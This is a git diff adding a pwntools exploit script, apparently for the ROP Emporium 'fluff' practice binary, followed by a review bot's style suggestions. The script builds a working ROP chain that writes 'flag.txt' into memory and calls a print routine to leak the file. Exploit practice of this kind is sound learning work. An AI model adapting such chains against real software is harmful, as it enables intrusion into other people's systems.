Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-xx86_64/fluff/exploit.py49
1 files changed, 49 insertions, 0 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
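Review bot: The padding is built one byte at a time in the loop near the top of the script (`payload = b''` followed by `for c in range(40): payload += b'a'`), and the loop variable `c` is never used; the single expression `payload = b'a' * 40` expresses the same thing and removes the unused name. In the same spirit, `return(payload)` at the end of write_str reads like a call and is conventionally written `return payload`. The numeric literals in write_str and letter_lookups carry no names, and the only explanatory comment is the one on the `p64(0x4000)` line, so a short comment per value or a named module-level constant would let a reader follow the routine without re-deriving each number.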